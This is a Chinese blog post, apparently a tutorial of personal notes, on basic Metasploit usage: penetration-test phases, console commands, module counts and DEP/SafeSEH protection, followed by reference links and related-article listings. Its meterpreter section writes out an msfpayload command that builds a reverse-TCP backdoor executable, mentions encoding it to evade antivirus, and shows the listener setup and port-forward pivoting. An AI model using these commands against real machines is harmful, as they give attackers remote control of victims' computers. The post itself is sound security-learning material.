metasploit基本用法

最新推荐文章于 2024-07-29 08:36:41 发布
最新推荐文章于 2024-07-29 08:36:41 发布
阅读量2.3k 收藏 5
点赞数 2
分类专栏: metasploit

    1.渗透测试

             metasploit几乎包含了渗透测试所有的工具,涉及渗透测试7个阶段。

        前期交互阶段:与客户讨论并确定渗透测试的范围和目标

        情报搜集阶段:采取各种手段搜集被攻击者的有用信息

        威胁建模阶段:通过搜集的情报信息, 标识目标系统可能存在的安全隐患

        漏洞分析阶段:分析漏洞的可行性以及最可行的攻击方法

        渗透攻击阶段:对目标进行渗透

        后攻击阶段:根据目标的不同, 灵活的应用不同技术. 让目标系统发挥更大的价值

        书写渗透报告阶段:撰写渗透报告

     使用元编程:metaprogramming语言自身作为程序数据输入的编程思想。

                            语言同时也是自身的元语言的能力称之为反射

       2.metasploit基本用法

             banner:查看版本信息

             db_driver:metasploit测试前,需要连接数据库(有的版本自动连接)db_connect

             search:查找相关模块shellcode(search name:**)

             use:使用模块back退出

             show options:查看模块参数设置

             set:设置参数信息或加载PAYLOAD(setg设置后保存)

             exploit:渗透攻击(run别名)

             check:测试target(目标操作系统)设置是否正确

             edit:编辑当前模块

             irb:ruby脚本命令行模式

             jobs:查看控制台上的任务

       3.metasploit攻击方式分类

             635种(exploit)溢出模块、314种(auxiliary)辅助模块、215种(payload)加载模块、27种(encoder免杀处理用)编码、8种(nops)

                          溢出攻击:主动溢出和被动溢出(主动攻击获取权限和监听获取权限)

       4.meterpreter模块

             msfpayload制作后门程序,在远端电脑运行,使用msfencode制作免杀
             msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.101.105 LPORT=444 X>meter.exe
             
             本机msfconsole
                   use exploit/multi/handler
                   set PAYLOAD windows/meterpreter/reverse_tcp
                   set LHOST 0.0.0.0
                   set LPORT 444
                   show options
                   run/exploit    攻击并连接远端后门,进入meterpreter
                   
              基本隧道代理功能 
                   portfwd   -h  (portfwd add -l 2222 -r 10.1.1.129 - p 3389 反弹10.1.1.129端口3389到本地2222并监听)
                   pivot 
              二级代理/三级代理
                   ...
       5.metasploit二次开发

             metasploit所有模块使用ruby编写,msfcli用户接口程序,2015.6.8已被官方团队移除,但仍然可以使用            

             metasploit所有模块继承自msf::Module,模块写好后,重启console在响应的exploit、auxiliary、payload、endcoder、nops目录中可以看到

       6.系统DEP保护        

             系统内存溢出漏洞,根因在于系统代码段和数据段没有明确的划分。DEP保护,阻止数据页执行shellcode代码

                   计算机->系统属性->高级->性能->数据执行保护(windows软件DEP、最下角显示CPU硬件是否支持DEP)

             DEP保护分为:软件DEP即SafeSEH(编译后生成合法的函数地址加以保护,以区分异常数据页函数),硬件DEP(标记NX不可执行区域)

                       SafeSEH和SEH(结构异常处理)不同,SEH需要构建SEH链表指针,以线程为单位。汇编中注册异常回调函数如下:

                            (FS寄存器,存放线程TEB数据)

            VS开发中,DEP保护链接默认开启

                   


本文参考:

metasploit教程:

http://pan.baidu.com/s/1kT3RuL5

相关论坛:

http://bbs.pediy.com(看雪论坛)

http://www.wooyun.org(乌云)

http://blog.sina.com.cn/s/blog_721d9f340100nkw5.html

http://bobao.360.cn/news/detail/1132.html 相关资源整理

https://www.offensive-security.com/metasploit-unleashed/about-meterpreter/ 国外的安全技术网站(介绍meterpreter)

https://www.91ri.org/tag/metasploit

http://www.docin.com/p-499012506.html

http://www.cnblogs.com/dsky/archive/2013/04/26/3044626.html(DEP)

http://www.hx95.com/Article/Ddos/201501/85101.html (meterpreter)

求天下者-积少成多
关注
专栏目录
Metasploit 基本使用方法
qq_45541451的博客
11-23 1560
Metasploit 基本使用方法 1.手动启动数据库 systemctl start postgresql systemctl enable postgresql 2.第二种使用终端命令 msfconsole help Core Commands #核心命令 Module Commands #模块命令 Job Commands #后台任务命令 Resource Script Commands #资源脚本命令 Database Backend Commands #数据库后端命令 Credentials Ba
Metasploit基本用法
Johnathan的博客
02-25 366
今天玩了一把内网渗透,其中主要用到了metasploit这款内网渗透神器。metasploit大家肯定不陌生,我也在很早之前就有接触过,但每次重新使用它时都会遗忘一些用法,因此为了方便查询我在本篇记录下metasploit神器的一些常用命令,以及内网渗透中如何使用它。 Mac下安装metasploit mac下安装metasploit比较简单,官网下载pkg安装包,直接安装即可;需要注意的是安装完成后的路径。 msfconsole路径: /opt/metasploit-framework/bin
metasploit 使用教程
热门推荐
jiangliuzheng的专栏
01-20 10万+
METASPLOIT基础入门 1、基础知识 1.1 简介 Metasploit是一款开源安全漏洞检测工具,附带数百个已知的软件漏洞,并保持频繁更新。被安全社区冠以“可以黑掉整个宇宙”之名的强大渗透测试框架。 Metasploit Framework最初是 HD Moore 个人的想法,当时他在一家安全公司工作,他于2003年10月发布了第一个基于Perl的Metasp
Metasploit入门教程(非常详细)从零基础入门到精通,看完这一篇就够了!
最新发布
Python_0011的博客
07-29 940
Metasploit是目前世界上领先的渗透测试工具,也是信息安全与渗透测试领域最大的开源项目之一。它彻底改变了我们执行安全测试的方式。Metasploit之所以流行,是因为它可以执行广泛的安全测试任务,从而简化渗透测试的工作。Metasploit 适用于所有流行的操作系统,本文中,主要以Kali Linux为主。因为Kali Linux预装了 Metasploit 框架和运行在框架上的其他第三方工具。
Metasploit使用教程(操作实例,meterpreter,msfconsole,msfcli,抓包)
qq_44111753的博客
12-13 6236
1、控制Metasploit终端(MSFCONSOLE) MSFCONSOLE主要用于管理Metasploit数据库,管理会话,配置并启动Matasploit模块 一些通用命令: help:该命令允许用户查看执行命令的帮助信息 use module:该命令允许用户加载选择的模块 set optionname module:该命令允许用户为模块设置不同的选项。 run:该命令用来启动一个非渗透攻击模块 search module:该命令允许用户搜索一个特定的模块 exit:退出MSFCONSOLE 操作步骤:
Metasploit安装及使用教程(非常详细)从零基础入门到精通,看完这一篇就够了。
2201_75735270的博客
01-22 674
通过本篇文章,我们将会学习以下内容:1、在Windows上安装Metasploit2、在Linux和MacOS上安装Metasploit3、在Kali Linux中使用 Metasploit4、升级Kali Linux5、使用虚拟化软件构建渗透测试实验环境6、配置SSH连接7、使用SSH连接Kali8、配置PostgreSQL数据库9、创建工作区10、使用数据库11、使用hosts命令12、理解services命令。
Metasploit基本使用
qq_68233961的博客
11-05 744
Metasploit基本使用
网络安全kali渗透学习 web渗透入门 Metasploit基本使用方法
web18484626332的博客
03-07 2351
Metasploit是一款开源的安全漏洞检测工具,可以帮助安全和IT专业人士识别安全性问题,验证漏洞的缓解措施,并管理专家驱动的安全性进行评估,提供真正的安全风险情报。这些功能包括智能开发,代码审计,Web应用程序扫描,社会工程。团队合作,在Metasploit和综合报告提出了他们的发现。 这篇文章教大家了解Metasploit基本使用方法 以下有视频版还有文字版 不知道怎么操作的请看文字版的,里面详细的步骤。 关注公众号侠盗男爵回复【kali系统】 视频版↓: 网络安全/kali/黑客/web安全/渗透测
Metasploit 基本使用
qq_44237206的博客
05-16 305
Metasploit程序需要使用Postgresql数据库。 PostgresqI概述: PostgreSQL是一种特性非常齐全的自由软件的对象-关系型数据库管理系统(ORDBMS),是以加州大学计算机系开发的POSTGRES 4.2 版本为基础的对象关系型数据库管理系统。 官网:https://www.postgresql.org/ 注:PostgreSQL:世界上最先进的开源关系数据库 扩展:PostgreSQL和 MySQL数据的应用场景区别: 从应用场景来说,PostgreSQL更加适合严格的..
Metasploit使用教程
Kali与编程
03-23 1997
例如,payload/windows/meterpreter/reverse_tcp是一个Windows系统的Meterpreter反向Shell Payload,可以建立与攻击机的反向连接并提供完全的系统访问权限。Payload模块是Metasploit中最重要的模块之一,它用于实现对目标系统的控制。Metasploit支持多种不同的操作系统(Windows、Linux、MacOS等)和硬件平台(x86、ARM等),并提供了多种编程接口,包括Ruby API、Python API、Java API等。
metasploit快速入门(一)安装部署
whatday的专栏
11-03 8667
目录 简介 1 在Windows上安装Metasploit 2在Linux和MacOS上安装Metasploit 3在Kali Linux上使用Metasploit 4升级Kali Linux 5构建渗透测试实验环境 6配置SSH连接 7使用SSH连接到Kali 8配置PostgreSQL数据库 9创建工作区 10使用数据库 11 使用 hosts 命令 ...
Metasploit教程
06-07
Metasploit教程Metasploit教程Metasploit教程Metasploit教程
metasploit 简单使用教程
weixin_48103302的博客
08-28 924
metasploit 使用教程前言一、Metasploit是什么?二、准备工作三、具体步骤 前言 Msfconsole提供了一个一体化的集中控制台。通过msfconsole,你可以访问和使用所有的metasploit的插件,payload,利用模块,post模块等等。Msfconsole还有第三方程序的接口,比如nmap,sqlmap等,可以直接在msfconsole里面使用。 在启动MSF终端之后,可以首先输入help命令列出MSF终端所支持的命令列表,包括核心命令集和后端数据库命令集。对于其中的大部.
Metasploit用法大全
weixin_30807779的博客
01-24 815
Metasploit用户接口msfconsoleArmitage: KaliGUI启动;armitage命令启动 Metasploit功能程序msfvenom集成了载荷生成器、载荷编码器、空指令生成器的功能查看详细指令选项:msfvenom-h 服务器消息块协议扫描msf>useauxiliary/scanner/smb/smb_version 搜寻配置不当的Microso...
【超详细】渗透测试平台Metasploit使用教程(框架介绍、靶机安装、基本使用方法)
fly_enum的博客
12-22 4270
Metasploitframework,简称msf。Metasploit是一个渗透测试平台,能够查找,利用和验证漏洞。Metasploit是一个免费的、可下载的框架,通过它可以很容易的对计算机软件漏洞实施攻击。它本身附带数百个已知软件漏洞的专业级漏洞攻击工具。Metasploit的设计初衷是打造一个攻击工具开发平台。
Metasploit 渗透测试框架的基本使用
05-26
以下是 Metasploit 渗透测试框架的基本使用方法: 1. 安装 MetasploitMetasploit 可以在 Windows、Linux 和 Mac OS X 等操作系统上运行。你可以从 Metasploit 的官方网站下载并安装它。 2. 启动 Metasploit:在...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值